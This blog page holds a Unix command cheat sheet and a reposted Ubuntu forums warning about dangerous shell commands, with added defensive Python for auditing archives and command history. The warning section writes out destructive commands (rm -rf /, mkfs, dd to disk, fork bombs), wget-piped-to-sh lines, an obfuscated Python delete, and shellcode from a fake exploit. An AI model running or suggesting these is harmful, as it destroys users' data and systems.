Kevin Hatfield's Blog

Kevin's blurry train of thought……


UNIX Commands Cheat List!

Tuesday, January 13th, 2009


Unix commands cheat list

This is nothing more than a place for me to jot down all the *nix commands that I have a hard time remembering. It is not a tutorial, and all the information here is to be used at your own risk. The commands here are used for either FreeBSD 5.3, OS X 10.3 or both.

1. Flush the DNS cache:

lookupd -flushcache

2. Run CPAN in shell mode:

perl -MCPAN -e shell

3. Start, Stop, Restart Apache:

apachectl start
apachectl stop
apachectl restart

4. Shutdown and reboot:

shutdown -r now

5. Show disk space:

df -k (in KB)
df -m (in MB)
df -g (in GB)

6. Show disk usage:

du -hc

7. Show disk usage one folder deep:

du -hc -d1

8. Show running processes:

ps aux

9. Edit the Apache configuration file (for FreeBSD):

pico /usr/local/etc/apache/httpd.conf

10. Edit the Apache configuration file (for OS X):

pico /private/etc/httpd/httpd.conf (for Apache 1.3)

11. Run the install utility for FreeBSD:

/stand/sysinstall

12. Rebuild the access or virtusertable databases after editing /etc/mail/access or /etc/mail/virtusertable:

make maps

13. Dump a MySQL database:

mysqldump -u USER -pPASSWORD DBNAME > filename.sql

Note that a password passed as -pPASSWORD shows up in the process list (see item 8) and in your shell history; a bare -p makes mysqldump prompt for it instead.

14. Import from a dump file into MySQL:

mysql -u USER -p DBNAME < filename.sql

15. Grab your most important configuration files and email them to yourself:

tar cvfz - /etc/rc.conf /etc/master.passwd /etc/fstab /usr/local/etc | uuencode seedfiles.tgz | mail -s "Web Server Seed Files" someguy@someserver.com

16. Configure Apache 2 from source with the proper modules:

sudo ./configure --prefix=/apache2 --enable-cgi=yes --enable-cgid=yes --enable-dav=yes --enable-expires=yes --enable-headers=yes --enable-info=yes --enable-rewrite=yes --enable-so=yes --enable-speling=yes --enable-ssl=yes --enable-usertrack=yes --enable-vhost-alias=yes

17. Change the MySQL password:

mysqladmin -u root password 'new password goes here'

18. rsync for dummies:

rsync -r --stats --progress --exclude 'some wildcard' /from/some/folder /to/some/other/folder

19. PHP5 on OS X:

http://www.entropy.ch/software/macosx/php/ has a ready to run installer with every possible option turned on. Saves a hell of a lot of hassle.

20. CVS – How to set the CVSROOT in bash:

Put this in .bashrc:
CVSROOT=/usr/local/cvsroot
export CVSROOT

21. CVS – How to set your default editor to pico instead of vi:

EDITOR=pico
export EDITOR

22. CVS – Checkout

(from the folder you want to hold the checked out code)

cvs checkout project

23. CVS – Commit

(from within the working folder)

cvs commit

It will open pico so you can type an explanation of the changes committed.

24. CVS – Refresh working copy

(from within the working folder)

cvs update

I don’t trust this one 100%, so every now and then I re-check out the source.

25. Webmin

A great way to easily manage *nix servers is Webmin. I use it on both FreeBSD and it is pretty damn nice. While some of its modules are a bit rustic, overall it beats the hell out of having to use the CLI for annoying stuff.

26. Split a file based on a separation string

csplit -k -f output_file_prefix source_file_name '/separation string/' {99}

99 is the number of times to repeat the command. In the unix flavor of csplit you can do {*}, but OS X doesn’t like it, so I am setting it to 99.

27. Run the Apache Bench:

ab -n100 -c20 http://www.mydomain.com/

Where 100 is the number of iterations and 20 is the number of concurrent hits.

28. Default admin web site for Smoothwall Express:

https://smoothwall.yourdomain.com:441/

29. Recursive find:

find . -iname "*\?*"

finds any file whose name contains the escaped character (in this case a question mark), searching recursively from your current folder.

30. ftp upload from command line:

This one falls under “annoying quirks of OS X.” I wasted over one hour trying to decipher the man page for ftp for 10.4 because it would not let me upload a file from a compressed one-line command within a bash script. Here is the one that worked:

ftp -u ftp://$USER:$PASSWORD@$FTPSERVER/$FTPFOLDER/$REMOTE_FILENAME $LOCAL_FILENAME

This one worked like a champ.

Dangerous commands for Linux users :)

Thursday, November 29th, 2007

As posted on: http://ubuntuforums.org/announcement.php?a=54

As requested by some, for the education of our users, here are some common examples of dangerous commands that should raise a bright red flag. Again, these are extremely dangerous and should not be attempted on a computer that has any physical connection to valuable data — many of them will even cause damage from a LiveCD environment.

Again, DANGEROUS COMMANDS — look but DO NOT RUN.

Also, this is far from an exhaustive list, but should give you some clues as to what kind of things people may try to trick you into doing. Remember this can always be disguised in an obfuscated command or as a part of a long procedure, so the bottom line is take caution for yourself when something just doesn’t “feel right”.

Delete all files, delete current directory, and delete visible files in current directory. It’s quite obvious why these commands can be dangerous to execute.
Code:

rm -rf /
rm -rf .
rm -rf *

Reformat: Data on device mentioned after the mkfs command will be destroyed and replaced with a blank filesystem.
Code:

mkfs
mkfs.ext3
mkfs.anything

Block device manipulation: Causes raw data to be written to a block device. Oftentimes this will clobber the filesystem and cause total loss of data:
Code:

any_command > /dev/sda
dd if=something of=/dev/sda

Forkbomb: Executes a huge number of processes until system freezes, forcing you to do a hard reset which may cause corruption, data damage, or other awful fates.
In Bourne-ish shells, like Bash: (This thing looks really intriguing and provokes curiosity)
Code:

:( ){:|:&};:

In Perl
Code:

fork while fork

Tarbomb: Someone asks you to extract a tar archive into an existing directory. This tar archive can be crafted to explode into a million files, or inject files into the system by guessing filenames. You should make a habit of decompressing tars inside a cleanly made directory.

Decompression bomb: Someone asks you to extract an archive which appears to be a small download. In reality it’s highly compressed data and will inflate to hundreds of GBs, filling your hard drive. You should not touch data from an untrusted source.
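A defensive check for the two archive tricks above, as an added example that is not part of the original announcement: it lists a tar archive without unpacking it, flags entries that would land outside the destination directory, and compares the declared unpacked size with the download size. The archives it inspects are constructed in the code, and EXTRACT_DIR is a hypothetical destination.

```python
import io
import posixpath
import tarfile

EXTRACT_DIR = "/extract"  # hypothetical directory the archive would be unpacked into

def _make_tar(entries) -> bytes:
    """Build a gzip'd tar in memory from (name, bytes) pairs. Constructed test data."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tf:
        for name, data in entries:
            info = tarfile.TarInfo(name)
            info.size = len(data)
            tf.addfile(info, io.BytesIO(data))
    return buf.getvalue()

def sample_tarbomb() -> bytes:
    # One honest file plus two entries that would land outside the extraction directory.
    return _make_tar([("project/README", b"hello\n"),
                      ("../.bashrc", b"# dropped into the parent directory\n"),
                      ("/etc/cron.d/job", b"# absolute path\n")])

def sample_decompression_bomb() -> bytes:
    # 4 MiB of zeros gzips to a few KB, so the unpacked:compressed ratio is about 1000:1.
    return _make_tar([("zeros.bin", bytes(4 * 1024 * 1024))])

def audit_tar(data: bytes, max_members: int = 10_000, max_ratio: float = 100.0) -> dict:
    """List the archive without extracting it and say why it should not be unpacked."""
    report = {"members": 0, "unpacked_bytes": 0, "escapes": []}
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:*") as tf:
        for m in tf:
            report["members"] += 1
            report["unpacked_bytes"] += m.size
            # Resolve where the entry would land; anything outside EXTRACT_DIR is a tarbomb entry.
            dest = posixpath.normpath(posixpath.join(EXTRACT_DIR, m.name))
            if not dest.startswith(EXTRACT_DIR + "/"):
                report["escapes"].append(m.name)
            elif m.issym():
                # A symlink pointing outside the tree is the same trick in another form.
                target = posixpath.normpath(posixpath.join(posixpath.dirname(dest), m.linkname))
                if not target.startswith(EXTRACT_DIR + "/"):
                    report["escapes"].append(m.name)
    report["ratio"] = report["unpacked_bytes"] / max(len(data), 1)
    report["reject"] = (bool(report["escapes"]) or report["members"] > max_members
                        or report["ratio"] > max_ratio)
    return report
```

Call audit_tar(open("download.tgz", "rb").read()) before extracting anything from a source you do not control; a non-empty "escapes" list or a ratio in the hundreds is the signal to stop.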

Shellscript: Someone gives you the link to a shellscript to execute. This can contain any command he chooses — benign or malevolent. Do not execute code from people you don’t trust.
Code:

wget http://some_place/some_file
sh ./some_file

Code:

wget http://some_place/some_file -O- | sh

Compiling code: Someone gives you source code then tells you to compile it. It is easy to hide malicious code as a part of a large wad of source code, and source code gives the attacker a lot more creativity for disguising malicious payloads. Do not compile OR execute the compiled code unless the source is of some well-known application, obtained from a reputable site (i.e. SourceForge, the author’s homepage, an Ubuntu address).

A famous example of this surfaced on a mailing list disguised as a proof of concept sudo exploit claiming that if you run it, sudo grants you root without a shell. In it was this payload:
Code:

char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68\x00\x2d\x63\x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";

To the new or even lightly experienced computer user, this looks like the “hex code gibberish stuff” that is so typical of a safe proof-of-concept. However, this actually runs rm -rf ~ / & which will destroy your home directory as a regular user, or all files as root. If you could see this command in the hex string, then you don’t need to be reading this announcement. Otherwise, remember that these things can come in very novel forms — watch out.

Again, recall these are not at all comprehensive and you should not use this as a checklist to determine if a command is dangerous or not!

For example, 30 seconds in Python yields something like this:
Code:

python -c 'import os; os.system("".join([chr(ord(i)-1) for i in "sn!.sg!+"]))'

Where “sn!.sg!+” is simply rm -rf * shifted a character up. Of course this is a silly example — I wouldn’t expect anyone to be foolish enough to paste this monstrous thing into their terminal without suspecting something might be wrong.
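A small inspector in the spirit of the announcement, as an added example that is not from the original post: it runs signatures for the commands listed above over a constructed shell history and, because a shifted string defeats a literal match, undoes small character shifts inside quoted literals before matching again. It generalises the post's shift-by-one to any shift of up to five in either direction; an empty result means nothing was recognised, not that the command is safe.

```python
import re

# Signatures for the announcement's own examples: tree deletes, reformatting, raw writes
# to a block device, fork bombs, and a download piped straight into a shell.
DANGEROUS = [
    (re.compile(r"\brm\s+-\w*r\w*\s+(?:/|\*|\.|~)(?:\s|$)"), "recursive delete of a whole tree"),
    (re.compile(r"\bmkfs(?:\.\w+)?\b"), "filesystem (re)format"),
    (re.compile(r"(?:>\s*|\bof=)/dev/[sh]d[a-z]"), "raw write to a block device"),
    (re.compile(r":\s*\(\s*\)\s*\{.*:\s*\|\s*:\s*&"), "bash fork bomb"),
    (re.compile(r"\bfork\s+while\s+fork\b"), "perl fork bomb"),
    (re.compile(r"\b(?:wget|curl)\b.*\|\s*(?:sudo\s+)?(?:ba)?sh\b"), "download piped into a shell"),
]

def _shift(text: str, k: int) -> str:
    """Shift every character by k code points (the announcement's chr(ord(i)-1) trick)."""
    return "".join(chr(ord(c) + k) if ord(c) + k >= 0 else c for c in text)

def plain_matches(text: str) -> list:
    return [label for rx, label in DANGEROUS if rx.search(text)]

def inspect_command(cmd: str, max_shift: int = 5) -> list:
    """(how, shift, label) findings for one command; [] means unrecognised, not safe."""
    findings = [("plain", 0, label) for label in plain_matches(cmd)]
    # Encoded payloads hide in quoted literals: undo small shifts in both directions
    # on each literal and run the signatures again on the result.
    literals = re.findall(r"'([^']*)'", cmd) + re.findall(r'"([^"]*)"', cmd)
    for lit in literals:
        for k in [k for k in range(-max_shift, max_shift + 1) if k]:
            findings += [("shift", k, label) for label in plain_matches(_shift(lit, k))]
    return findings

# Constructed sample shell history: the announcement's examples plus two harmless lines.
SAMPLE_HISTORY = [
    "ls -la /",
    "rm -rf /",
    "dd if=something of=/dev/sda",
    "wget http://some_place/some_file -O- | sh",
    "python -c 'import os; os.system(\"\".join([chr(ord(i)-1) for i in \"sn!.sg!+\"]))'",
    "rm -rf ./build",
]

def scan_history(lines=SAMPLE_HISTORY) -> dict:
    """Map each flagged command line to its findings."""
    report = {}
    for line in lines:
        found = inspect_command(line)
        if found:
            report[line] = found
    return report
```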